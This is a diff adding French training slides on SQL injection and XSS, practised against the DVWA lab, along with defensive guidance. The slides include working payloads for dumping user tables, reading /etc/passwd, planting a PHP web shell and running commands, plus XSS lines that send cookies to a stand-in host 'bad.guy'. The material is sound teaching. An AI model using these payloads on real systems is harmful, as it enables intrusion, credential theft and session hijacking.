+    * avec un LIKE par exemple pour dÃ©duire lettre par lettre
+
+
+## [DiffÃ©rents types](https://www.linkedin.com/grp/post/36874-130061102)
+
+#### [<i class="fa fa-eye-slash"></i> (true) Blind](https://www.owasp.org/index.php/Blind_SQL_Injection)
+
+* Pas de message d'erreur
+* Pas de moyen de savoir si la requÃªte est valide ou non
+  * cas d'une redirection systÃ©matique
+  * nÃ©cessite en gÃ©nÃ©ral d'itÃ©rer
+  * avec un LIKE par exemple pour dÃ©duire lettre par lettre
+
+Note:
+- boolean type: formulaire d'authentification
+  - erreur en cas d'Ã©chec
+    - drapeau rouge
+  - home page en cas de succÃ©s
+    - drapeau vert
+  - attention une 404 ou une 500 peut Ãªtre le drapeau vert
+- blind typique
+  - accÃ¨s Ã  un contenu privÃ© www.example.org/display.php?item=1'
+    - redirige systÃ©matiquement sur la page d'authentification
+      - l'idÃ©e est de charger la requÃªte et de chronomtÃ©rer le temps d'exÃ©cution
+        - une requÃªte invalide ne sera pas exÃ©cutÃ© donc le temps de rÃ©ponse sera infÃ©rieur au temps d'une requÃªt valide qui sera exÃ©cutÃ©
+        - Benchmark() MySQL
+        - WaitFor() MSSQ
+
+
+## <i class="fa fa-eye"></i> [SQLi](https://www.owasp.org/index.php/SQL_Injection) Error-based
+
+L'idÃ©e est d'utiliser les commentaires pour terminer prÃ©maturÃ©ment l'exÃ©cution du SQL
+
+```php
+$id = $_GET['id'];
+$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
+$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
+$num = mysql_numrows($result);
+$i = 0;
+while ($i < $num) {
+   $first = mysql_result($result,$i,"first_name");
+   $last = mysql_result($result,$i,"last_name");
+   echo '<pre>';
+   echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
+   echo '</pre>';
+   $i++;
+}
+```
+
+
+## <i class="fa fa-eye"></i> [SQLi](https://www.owasp.org/index.php/SQL_Injection) Error-based
+
+dÃ©tectable en tentant une simple **'** en entrÃ©e
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id='&Submit=Submit#
+```
+
+produit
+
+```
+You have an error in your SQL syntax; check the manual
+that corresponds to your MySQL server version for
+the right syntax to use near ''''' at line 1
+```
+
+intÃ©ressant!
+
+
+## [SQL Injection - security low](http://dv.wa/vulnerabilities/sqli_blind/)  
+
+sensible Ã  (version human readable)
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' OR 1=1#&Submit=Submit
+```
+
+soit en version encodÃ©e
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=%27+OR+1%3D1+%3B%23%23&Submit=Submit
+```
+
+affiche la liste de tous les utilisateurs
+
+** <i class="fa fa-bomb"></i> on peut mieux faire !! **
+
+Note:
+- je donne les urls en mode human readable
+  - les valeurs sont Ã  copier dans le champs
+    - PAS dans l'url
+- se dÃ©tecte avec juste ' ou en fuzzant plus large
+  - fuzzdb/attack-playloads/sql-injection/detect/MySQL.fuzz.txt
+  - fuzzdb/attack-playloads/attack-payloads/all-attacks
+    - tester avec Burp
+    - avec la hackbar
+    - mettre un flag grep SQL
+    - filtrer par length, error, et flag SQL
+
+
+## [SQL Injection - security low](http://dv.wa/vulnerabilities/sqli_blind/)  
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' OR 1=1 ORDER BY 5#&Submit=Submit
+```
+
+affiche un message d'erreur
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' OR 1=1 ORDER BY 2#&Submit=Submit
+```
+
+est exÃ©cutÃ©e
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' OR 1=1 ORDER BY 3#&Submit=Submit
+```
+
+affiche un message d'erreur
+
+**<i class="fa fa-trophy"></i> par dichotomie**
+
+**il y a 2 champs dans la clause SELECT**
+
+Note:
+- va nous permettre d'Ã©tendre les requÃªtes Ã  d'autres tables
+
+
+## [<i class="fa fa-eye"></i> SQLi - security low](http://dv.wa/vulnerabilities/sqli_blind/)  
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' OR 1=1  UNION SELECT NULL, user()#&Submit=Submit
+```
+
+affiche l'utilisateur courant (mysqlusername@mysqlhost) Ã  la fin de la liste des users
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' or 0=0 UNION SELECT NULL, database()#&Submit=Submit
+```
+
+affiche le nom de la base de donnÃ©es Ã  la fin de la liste des users
+
+
+## [<i class="fa fa-eye"></i> SQLi - security low](http://dv.wa/vulnerabilities/sqli_blind/)  
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' AND 1=0 UNION SELECT NULL, table_name FROM information_schema.tables#&Submit=Submit
+```
+
+* affiche toutes les tables via la table virutelle [information_schema](http://dev.mysql.com/doc/refman/5.1/en/information-schema.html)
+  * quand on fait de l'**UNION** de deux tables distincts on parle de **Cross table**
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' AND 1=0 UNION SELECT NULL, table_name FROM information_schema.tables WHERE table_name LIKE '%user%'#&Submit=Submit
+```
+
+affiche toutes les tables qui contiennent user
+
+
+## [<i class="fa fa-eye"></i> SQLi - security low](http://dv.wa/vulnerabilities/sqli_blind/)  
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' AND 1=0 UNION SELECT NULL, concat(table_name,0x0a,column_name) FROM information_schema.columns WHERE table_name = 'users'#&Submit=Submit
+```
+
+* affiche toutes les champs de la table user
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' AND 1=0 UNION SELECT NULL, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) FROM users#&Submit=Submit
+```
+
+* affiche toutes les valeurs des champs *user* et *password* de la table user
+
+  * reste Ã  brute forcer
+
+
+## [<i class="fa fa-eye"></i> SQLi - security low](http://dv.wa/vulnerabilities/sqli_blind/)  
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' AND 1=0 UNION SELECT NULL, benchmark(5000000, encode('MSG', 'pass-phrase')) FROM users#&Submit=Submit
+```
+
+* chiffre 5 000 000 de fois la chaÃ®ne 'MSG' en utlisant 'pass-phrase' comme mot de passe
+  * DoS
+  * utile pour les vraies blind SQLi
+
+
+## [<i class="fa fa-eye"></i> SQLi - security low](http://dv.wa/vulnerabilities/sqli_blind/)  
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' AND 1=0 UNION SELECT NULL, LOAD_FILE("/etc/passwd")#&Submit=Submit
+```
+
+affiche toutes le contenu du fichier /etc/passwd
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=' AND 1=0 UNION SELECT NULL, "&lt;?php system(\$_GET[cmd]) ?&gt;" INTO DUMPFILE "/var/www/dvwa/hackable/uploads/shell.php"#&Submit=Submit
+```
+
+Ã©criture du fichier shell.php dans le systÃ¨me de fichiers
+
+```http
+http://dv.wa/hackable/uploads/shell.php?cmd=ls
+```
+execution de commandes systÃ¨mes avec les privilÃ¨ges du thread apache
+
+
+## [<i class="fa fa-eye"></i> SQLi - security medium](http://dv.wa/vulnerabilities/sqli_blind/)
+
+<i class="fa fa-exclamation-circle"></i> le code vulnÃ©rable a changÃ© entre low et medium
+
+* utilisation de la fonction [mysql_real_escape_string()](http://php.net/manual/fr/function.mysql-real-escape-string.php)
+  * ajoute un anti-slash aux caractÃ¨res suivants : NULL, \x00, \n, \r, \, ', " et \x1a.  
+    * contournable en appliquant l'encodage HTTP (HTML URL Encoding) aux caractÃ¨res injectÃ©s
+
+
+## [<i class="fa fa-eye"></i> SQLi - security medium](http://dv.wa/vulnerabilities/sqli_blind/)
+
+```http
+$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
+```
+
+devient
+
+```http
+$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
+```
+
+
+## [<i class="fa fa-eye"></i> SQLi - security medium](http://dv.wa/vulnerabilities/sqli_blind/)
+
+donc l'injection du niveau low
+
+```http
+' OR user_id > 0#
+```
+
+devient pour fonctionner au niveau medium
+
+```http
+1 OR user_id > 0#
+```
+devient une encodÃ©e
+
+```http
+1%20OR%20user_id%20%3E%200
+```
+
+et s'injecte directement via l'url
+
+```http
+http://dv.wa/vulnerabilities/sqli/?id=1%20OR%20user_id%20%3E%200&Submit=Submit
+```
+
+Note:
+- Ã  saisir directement dans l'url
+- utiliser plutÃ´t l'encoder de burp
+- sinon hackbar Ã  comparer
+- https://www.information-security.fr/dvwa-sql-injection-solutions-protections/
+
+
+## [SQLmap](http://sqlmap.org/)
+
+* Fait tous le boulot Ã  votre palce
+  * une ligne de commmande
+    * affiche des rÃ©sultats propres
+    * abstrait
+      * le moteur de base de donnÃ©es
+      * les diffÃ©rentes techniques d'injections
+
+```http
+sqlmap --url "http://dv.wa/vulnerabilities/sqli/?id=1&Submit=Submit#;" --cookie="PHPSESSID=ss07hir39n0drbanfiqh6rt7e2; security=low" --tables
+```
+
+<i class="fa fa-exclamation-circle"></i> remplacer par la valeur de votre jeton de session
+
+
+### [<i class="fa fa-check-square"></i> SQLi (Blind) - security low](http://dv.wa/vulnerabilities/sqli_blind/)  
+
+* on se concentre sur le user 1337 (id=3)
+  * on cherche Ã  deviner son mot de passe
+
+```http
+http://dv.wa/vulnerabilities/sqli_blind/?id=3' AND password LIKE 'a%'#&Submit=Submit
+```
+
+n'affiche rien!! en revanche
+
+```http
+http://dv.wa/vulnerabilities/sqli_blind/?id=3' AND password LIKE '8%'#&Submit=Submit
+```
+
+affiche
+
+```
+ID: 3' AND password LIKE '8%
+First name: Hack
+Surname: Me
+```
+
+
+## <i class="fa fa-eye-slash"></i> [True Blind SQL Injection](https://www.owasp.org/index.php/Blind_SQL_Injection)
+
+* Si aucun output n'est disponible
+  * on ajoute du calcul artificiellement
+    * la requÃªte est valide
+      * le temps de rÃ©ponse = temps de traitement + temps de calcul artificiel
+    * la requÃªte est invalide
+      * le temps  de rÃ©ponse = temps de traitement
+
+problÃ©matique similaire Ã  une boolÃ©enne
+
+Note:
+- discussion sur les vraies blind
+- in fine mÃªme problÃ¨me une fois scripter
+
+
+## <i class="fa fa-medkit"></i> Se prÃ©server
+
+* Filtrage par listes blanches
+  * caster
+    * [intval()](http://php.net/manual/fr/function.intval.php), [floatval()](http://php.net/manual/fr/function.floatval.php), ...
+      * si l'id est toujours un entier ...
+  * Ã©chappement des paramÃ¨tres de requÃªtes
+    * [stripslashes()](http://php.net/manual/fr/function.stripslashes.php), [mysql_real_escape_string()](http://php.net/manual/fr/function.mysql-real-escape-string.php)
+
+
+## <i class="fa fa-medkit"></i> Se prÃ©server
+
+* Web Application Firewall (WAF)
+    * [mod_security](https://www.modsecurity.org/)
+      * log le POST
+    * <i class="fa fa-fire"></i> [SQL Injection: Les techniques dâ€™Ã©vasion de filtres](http://www.mcherifi.org/hacking/sql-injection-les-techniques-devasion-de-filtres.html)
+* Les privilÃ¨ges de l'utilisateur SQL ont un sens
+  * [FILE](https://dev.mysql.com/doc/refman/5.1/en/privileges-provided.html#priv_file)
+  * attention aux permissions sur la base de donnÃ©es
+    * information_schema ...
+* Changer les prÃ©fixes de table des CMS quand c'est possible
+
+
+## <i class="fa fa-medkit"></i> Se prÃ©server
+
+* [Ne plus utiliser les fonctions mysql_ leur prÃ©fÃ©rer mysqli_](http://stackoverflow.com/questions/548986/mysql-vs-mysqli-in-php)
+* Utiliser des requÃªtes prÃ©parÃ©e
+  * PDO, ORM : Doctrine2, Propel
+* ÃŠtre le plus silencieux possibles quant aux requÃªtes invalides
+  * [@](http://php.net/manual/fr/language.operators.errorcontrol.php) mais pas [or die()](http://php.net/manual/fr/function.die.php)
+  * [error_reporting](http://php.net/manual/fr/function.error-reporting.php), pas [mysql_error()](http://php.net/mysql_error) ni [mysqli_error()](http://php.net/manual/fr/mysqli.error.php)
+* repÃ©rer les requÃªtes suspectes dans les logs
+
+Note:
+- TODO regarder si les messages sont dÃ©sactiables Ã  partir de MySQL
diff --git a/content/slides/1337/md/top10.md b/content/slides/1337/md/top10.md
new file mode 100644
index 0000000000000000000000000000000000000000..30a5872832a41f37d8cec68e83d5147fa1e14c4a
--- /dev/null
+++ b/content/slides/1337/md/top10.md
@@ -0,0 +1,61 @@
+## [Owasp top 10 (2013)](https://www.owasp.org/index.php/Top_10_2013-Top_10)
+
+#### <i class="fa fa-file-pdf-o"></i> [FR](http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20French.pdf)
+
+### <i class="fa fa-book"></i> [All Attack types](https://www.owasp.org/index.php/Category:Attack)
+
+
+## [Owasp top 10 (2013)](https://www.owasp.org/index.php/Top_10_2013-Top_10)
+
+1. [Injection](https://www.owasp.org/index.php/Top_10_2013-A1-Injection)
+2. [Broken Authentication and Session Management](https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management)
+3. <a href="https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)">Cross-Site Scripting (XSS)</a>
+4. [Insecure Direct Object References](https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References)
+5. [Security Misconfiguration](https://www.owasp.org/index.php/Top_10_2013-A5-Security_Misconfiguration)
+6. [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure)
+7. [Missing Function Level Access Control](https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control)
+8. <a href="https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)">Cross-Site Request Forgery (CSRF)</a>
+9. [Using Components with Known Vulnerabilities](https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities)
+10. [Unvalidated Redirects and Forwards](https://www.owasp.org/index.php/Top_10_2013-A10-Unvalidated_Redirects_and_Forwards)
+
+
+## [Owasp top 10 (2017)](https://www.owasp.org/index.php/Top_10-2017_Top_10)
+
+1. [<i class="fa fa-hand-o-right" aria-hidden="true"></i> Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection)
+2. [<i class="fa fa-hand-o-right" aria-hidden="true"></i> Broken Authentication and Session Management](https://www.owasp.org/index.php/Top_10-2017_A2-Broken_Authentication)
+3. [<i class="fa fa-hand-o-up" aria-hidden="true"></i> Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure)
+4. <a href="https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE)"><i class="fa fa-hand-peace-o" aria-hidden="true"></i> XML External Entities (XXE)</a>
+5. [<i class="fa fa-hand-peace-o" aria-hidden="true"></i> Broken Access Control](https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control)
+6. [<i class="fa fa-hand-o-down" aria-hidden="true"></i> Security Misconfiguration](https://www.owasp.org/index.php/Top_10-2017_A6-Security_Misconfiguration)
+7. <a href="https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)"><i class="fa fa-hand-o-down" aria-hidden="true"></i> Cross-Site Scripting (XSS)</a>
+8. [<i class="fa fa-hand-peace-o" aria-hidden="true"></i> Insecure Deserialization](https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization)
+9. [<i class="fa fa-hand-o-right" aria-hidden="true"></i> Using Components with Known Vulnerabilities](https://www.owasp.org/index.php/Top_10-2017_A9-Using_Components_with_Known_Vulnerabilities)
+10. [<i class="fa fa-hand-peace-o" aria-hidden="true"></i> Insufficient Logging&Monitoring](https://www.owasp.org/index.php/Top_10-2017_A10-Insufficient_Logging%26Monitoring)
+
+
+## RÃ©partition par Attaques
+
+![Relative Portions of Each Attack Type](images/top10/Relative_Portions_of_Each_Attack_Type.png "Relative Portions of Each Attack Type")
+
+[source IMPERVA](http://www.imperva.com/docs/HII_Web_Application_Attack_Report_Ed4.pdf)
+
+
+## RÃ©partition par Attaques
+
+* Cross-site scripting (XSS)
+* SQL injection (SQLi)
+* Remote File Inclusion (RFI)
+* Local File Inclusion (LFI)
+* Email extraction (EmExt)
+* Directory traversal (DT)
+* Comment Spamming (ComSpm)
+<!-- https://www.whitehatsec.com/resource/stats.html -> owncloud/ssi/2015-Stats-Report.pdf to print -->
+<!-- http://www.symantec.com/security_response/publications/threatreport.jsp -->
+<!-- http://www.zdnet.fr/actualites/cybersecurite-a-quoi-s-attendre-dans-les-mois-qui-viennent-39822112.htm -->
+
+
+## Autres top 10 ...
+
+### <i class="fa fa-mobile"></i> [Top 10 - Mobile security](https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#tab=Top_10_Mobile_Risks)
+
+### <i class="fa fa-wordpress"></i> <i class="fa fa-drupal"></i>  [Top 10 des failles de sÃ©curitÃ© des CMS](http://www.cms.fr/articles/525-top-10-des-failles-de-securite-des-cms.html)
diff --git a/content/slides/1337/md/xss.md b/content/slides/1337/md/xss.md
new file mode 100644
index 0000000000000000000000000000000000000000..b9e0629acfe25257d0a987d0fbecd3ef8abeb90d
--- /dev/null
+++ b/content/slides/1337/md/xss.md
@@ -0,0 +1,368 @@
+# XSS
+
+## aka cross site script
+
+
+### <i class="fa fa-cogs"></i> Principe
+
+* Affichage de donnÃ©es utilisateur sans validation ou Ã©chappement
+  * par oubli du dÃ©veloppeur
+  * par les messages d'erreurs renvoyÃ©s par le langage
+    * tentative d'injection de code interprÃ©table par le navigateur de la cible
+
+
+### <i class="fa fa-user-secret"></i> Que peut on faire?
+
+* DÃ©facement de pages
+* Redirection arbitraire
+  * exploiter un CSRF (c.f. [CSRF](CSRF.htm))
+* Vol de cookies (session)
+* Browser hijacking
+
+Note:
+- RÃ©cupÃ©ration dâ€™informations
+- souvent c'est du JS qu'on cherche Ã  injecter
+- redirectiona rbitriare signifie aussi rÃ©Ã©criture d'url de formulaire Ã  la volÃ©e
+- dÃ©tection automatique
+  - Ã©lÃ©ment envoyÃ© dans la requÃªte et repris dans la rÃ©ponse
+  - on commencera par esssayer d'envoyer de l'html
+
+
+## XSS reflected
+
+* ou encore rÃ©flÃ©chie, non permanente
+  * le code malicieux n'est stockÃ© nulle part
+    * injectÃ© dans l'url et exÃ©cutÃ© au moment de l'accÃ¨s au lien malicieux
+      * fait forcÃ©ment appel Ã  l'ingÃ©nierie sociale pour inciter Ã  cliquer
+
+
+## XSS stored
+
+* ou encore stockÃ©e, permanente
+  * le code malicieux est stockÃ©
+    * exÃ©cutÃ© Ã  chaque fois que la donnÃ©e malicieuse est affichÃ©e par un utilisateur
+      * le recours Ã  l'ingÃ©nierie sociale n'est pas forcÃ©ment nÃ©cessaire
+
+Note:
+- dans le cas d'un CSRF on rÃ©cupÃ¨re rien on espÃ¨re que ca a marchÃ©
+
+
+## XSS
+
+![Bob](images/xss/XSS-bob.png "Bob")  ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Site faille](images/xss/XSS-sitefaille.png "Site faille") ![Serveur victime](images/xss/XSS-serveurvictime.png "Serveur victime")
+
+1.Bob consulte la page faillible et repÃ¨re une faille XSS
+
+
+## XSS
+
+![Bob](images/xss/XSS-bob.png "Bob") ![Scripts](images/xss/XSS-scripts.png "Scripts") ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Serveur pirate](images/xss/XSS-serveurpirate.png "Serveur pirate")
+
+2.Bob Ã©crit un payload JS qui rÃ©cupÃ¨re par exemple des informations utilisateurs et les envoies sur son serveur
+
+**Il rend ce script accessible via le XSS qu'il a dÃ©couvert sur la page faillible**
+
+
+## XSS
+
+![Bob](images/xss/XSS-bob.png "Bob")  ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Alice](images/xss/XSS-alice1.png "Alice")
+
+3.Bob envoie l'url du XSS Ã  Alice en l'incitant Ã  cliquer sur un lien forgÃ© **XSS rÃ©flÃ©chie**
+
+ou
+
+3.attend simplement qu'elle se connecte une page compromise **XSS stockÃ©e**
+
+Note:
+- test du XSS souvent alert ... mÃ©thode plus discrÃ¨te notamment pour XSS stored
+  - console.log > alert
+
+
+## XSS
+
+![Alice](images/xss/XSS-alice2.png "Alice")  ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Site piÃ©gÃ©](images/xss/XSS-sitepiege.png "Site piÃ©gÃ©") ![Serveur victime](images/xss/XSS-serveurvictime.png "Serveur victime")
+
+4.Alice lique sur le lien forgÃ© **XSS rÃ©flÃ©chie**
+
+ou
+
+4.Alice consulte la page compromise et pense avoir Ã  faire Ã  l'originale **XSS stockÃ©e**
+
+
+## XSS
+
+![Alice](images/xss/XSS-alice2.png "Alice") ![DonnÃ©es utilisateur](images/xss/XSS-infos.gif "DonnÃ©es utilisateur") ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Scripts](images/xss/XSS-scripts.png "Scripts") ![Serveur victime](images/xss/XSS-serveurvictime.png "Serveur victime")
+
+5.la page compromise exÃ©cuter le payload JS de Bob
+
+
+## DÃ©facement
+
+### [XSS stored - security low](http://dv.wa/vulnerabilities/xss_s/)
+
+* l'idÃ©e est de recouvrir la page
+  * avec un message "p0wned" style
+  * avec une page malicieuse
+    * imiter un formulaire d'authentification lÃ©gitime pour l'utilisateur
+      * rÃ©cupÃ©rer les donnÃ©es saisies et rediriger l'utilisateur
+        * Ãªtre le plus silencieux possible dans la navigation
+
+
+### [XSS stored - security low](http://dv.wa/vulnerabilities/xss_s/)
+
+ ```html
+<iframe src="http://bad.guy/login.html"
+  style="position: absolute; top:0; left: 0; width: 100%; height: 100%;">
+</iframe>
+```
+
+* <i class="fa fa-bell-o"></i> maxlength="50" du textarea pose problÃ¨me
+  * contournable en utilisant burp comme proxy<!-- .element class="fragment rollin" -->
+  * contournable avec l'inspecteur du navigateur (F12)<!-- .element class="fragment rollin" -->
+
+!["inspector"](images/xss/inspector.png "inspector")<!-- .element class="fragment rollin" -->
+
+Note:
+- on a injectÃ© que du HTML ...
+
+
+## Vol de session
+
+* Tout le contexte du navigateur est accessible
+  * [crÃ©ant une vÃ©ritable empreinte de votre navigateur](https://panopticlick.eff.org)
+
+* l'appel au script distant est rÃ©alisÃ© en javascript
+
+```js
+<script>
+location.replace("http://bad.guy/thief.php?cookie=" + document.cookie);
+</script>
+```
+
+
+### [XSS stored - security medium](http://dv.wa/vulnerabilities/xss_s/)
+
+filtrer la balise &lt;script&gt; ne suffit pas
+
+```js
+<img src="javascript:location.replace('http://bad.guy/thief.php?cookie=' + document.cookie)" />
+```
+
+mais [les navigateurs rÃ©cents n'exÃ©cutent pas le js de l'attribut src de la balise img](https://www.mozilla.org/en-US/security/advisories/mfsa2006-72/)
+
+```js
+<img src="http://2.com/3.gif" onerror="javascript:location.replace('http://bad.guy/thief.php?cookie=' + document.cookie)" />
+```
+
+**il reste les Ã©vÃ©nements ;)**
+
+Note:
+- coups de la limitation caractÃ¨re cÃ´tÃ© HTML Ã  faire pÃ©ter avec l'inspecteur
+
+
+## [XSS reflected - low medium](http://dv.wa/vulnerabilities/xss_r/)
+
+Poc
+
+```http
+http://dv.wa/vulnerabilities/xss_r/?name=<script>alert('pipo')</script>
+```
+
+soit correctement encodÃ©e
+
+```http
+http://dv.wa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27pipo%27%29%3C%2Fscript%3E
+```
+
+
+## dÃ©facement
+
+```http
+http://dv.wa/vulnerabilities/xss_r/?name=<iframe src="http://bad.guy/login.html" style="width: 100%; height: 100%; position: absolute; top:0; left: 0;"></iframe>
+```
+
+```http
+http://dv.wa/vulnerabilities/xss_r/?name=%3Ciframe+src%3D%22http%3A%2F%2Fbad.guy%2Flogin.html%22+style%3D%22width%3A+100%25%3B+height%3A+100%25%3B+position%3A+absolute%3B+top%3A0%3B+left%3A+0%3B%22%3E%3C%2Fiframe%3E
+```
+
+
+## vol de session
+
+```http
+http://dv.wa/vulnerabilities/xss_r/?name=<script>location.replace('http://bad.guy/thief.php?cookie=' + document.cookie);</script>
+```
+
+```http
+http://dv.wa/vulnerabilities/xss_r/?name=%3Cscript%3E+location.replace%28%27http%3A%2F%2Fbad.guy%2Fthief.php%3Fcookie%3D%27+%2B+document.cookie%29%3B+%3C%2Fscript%3E
+```
+
+Note:
+- plus ciblÃ©e
+  - nÃ©cessite plus d'ingÃ©niositÃ© pour obtenir le clic
+  - quid de la confiance qu'on accorde au js chargÃ©s ailleurs
+    - on ne les contrÃ´le pas
+
+
+## Browser Hijacking
+
+* [BeEF - The Browser Exploitation Framework Project](http://beefproject.com/)
+  * inclusion d'un hook.js
+    * les naviagteurs connetÃ©s Ã  la page se comportent ensuite comme des zombies
+      *  rÃ©pondent aux payloads qu'on leur envoie
+
+![Beef](images/xss/beef-webcam.jpg "Beef")<!-- .element style="margin: 10px" width="60%" -->
+
+
+## <i class="fa fa-medkit"></i> Se prÃ©server
+
+* utiliser un moteur de template
+  * Ã©chappe par dÃ©faut
+
+* dans le `php.ini` pour Ã©viter la manipulation des cookies via javascript
+
+```http
+session.cookie_httponly = 1
+```
+
+
+## <i class="fa fa-medkit"></i> Se prÃ©server
+
+* Ã©chapper / filtrer les entrÃ©es
+  * [htmlspecialchars()](http://php.net/manual/fr/function.htmlspecialchars.php) transforme tous les caractÃ¨res en entitÃ© html
+    * [htmlentities()](http://php.net/manual/fr/function.htmlentities.php) fait l'opÃ©ration inverse
+  * listes blanches
+    * Web Application Firewall (WAF)
+      * [mod_security](https://www.modsecurity.org/)
+
+
+## <i class="fa fa-medkit"></i> Se prÃ©server
+
+* <i class="fa fa-fire"></i> [XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
+
+* <i class="fa fa-fire"></i> [<i class="fa fa-github"></i> alcuadrado/hieroglyphy](https://github.com/alcuadrado/hieroglyphy)
+
+* [<i class="fa fa-newspaper-o"></i> permet de convertir le code js en caractÃ¨res non alphanumÃ©riques en le gardant fonctionnel](http://patriciopalladino.com/blog/2012/08/09/non-alphanumeric-javascript.html)
+
+* cotÃ© client
+  * [<i class="fa fa-firefox"></i> NoScript](https://addons.mozilla.org/fr/firefox/addon/noscript/) est une option
+
+Note:
+- waf pro mode apprentissage avant le lancement pre prod
+  - mod_security aucun mode apprentissage
+
+
+## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives)
+
+* En-tÃªte renvoyÃ©e cÃ´tÃ© serveur
+  * protÃ©ger son contenu
+  * protÃ©ger ses utilisateurs
+  * possibilitÃ© de reporting
+    * quelles tentatives ont Ã©tÃ© menÃ©es
+
+
+## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives)
+
+```http
+Content-Security-Policy: script-src 'self' https://apis.google.com; frame-src 'none'
+```
+
+* informera le browser que
+  * seuls les scripts en provenance de la page elle mÃªme et de apis.google.com pourront Ãªtre exÃ©cutÃ©s
+  * les balises iframes ne doivent pas Ãªtre interprÃ©tÃ©es
+
+
+## [<i class="fa fa-medkit"></i> **CSP**: Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives)
+
+<div style="text-align: center">
+  ![CSP](images/xss/csp.png "CSP")
+</div>
+
+* [<i class="fa fa-newspaper-o"></i> Why is CSP Failing? Trends and Challenges in CSP Adoption](mweissbacher.com/publications/csp_raid.pdf)
+
+Note:
+- couvre le cas d'un XSS js dans une balise src
+- couvre Ã©galement le cas d'une iframe qui recouvre une page lÃ©gitime
+
+
+## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/)
+
+  * concerne *XMLHttpRequest*
+    * restreint les interactionsaux ressources de mÃªme origine
+      * protocole + "://" + hÃ´te + ":" + [port]
+
+
+## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/)
+
+protÃ¨ge l'intÃ©gritÃ© de la page
+
+```js
+$(function() { // on Load jQuery style
+  $.ajax({
+    url: "http://bad-guy.com/data.php"
+  }).done(function(untrustedData) {
+    injectInMyDOM(untrustedData);
+  });
+});
+```
+
+<div style="text-align: center">
+  ![SOP](images/xss/sop.png "SOP")
+</div>
+
+
+## [<i class="fa fa-medkit"></i> **SOP**: Same Origin Policy](https://developer.mozilla.org/fr/docs/Web/JavaScript/)
+
+protÃ¨ge la confidentialitÃ© des sessions
+
+```js
+$(function() { // on Load jQuery style
+  $.ajax({
+    url: "https://gmail.com"
+  }).done(function(sensitiveData) {
+    $.post("http://bad-guy.com/data.php", { sensitive_data: sensitiveData });
+  });
+});
+```
+
+
+## [<i class="fa fa-medkit"></i> **CORS**: Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS)
+
+* contrÃ´ler les accÃ¨s en mode cross-site
+  * concerne l'Ã©change entre fournisseurs de services
+* effectuer des transferts de donnÃ©es sÃ©curisÃ©s
+  * entre sources sÃ»res niveau injection & confidentialitÃ©
+
+
+## [<i class="fa fa-medkit"></i> **CORS** Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS)
+
+le client ajoute automatiquement une en-tÃªte HTTP
+
+```http
+Origin: http://www.foo.com
+```
+
+le serveur doit ajouter une en tÃªte HTTP d'autorisation pour le domaine
+
+```http
+Access-Control-Allow-Origin: http://www.foo.com
+```
+
+en-tÃªte d'autorisation pour tous les domaines
+
+```http
+Access-Control-Allow-Origin: *
+```  
+
+
+## [<i class="fa fa-medkit"></i> **CORS** Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS)
+
+* autorise tous les verbes HTTP
+  * [JSONP](http://igm.univ-mlv.fr/~dr/XPOSE2009/ajax_sop_jsonp/jsonp_presentation.html) n'autorisait que la mÃ©thode GET
+
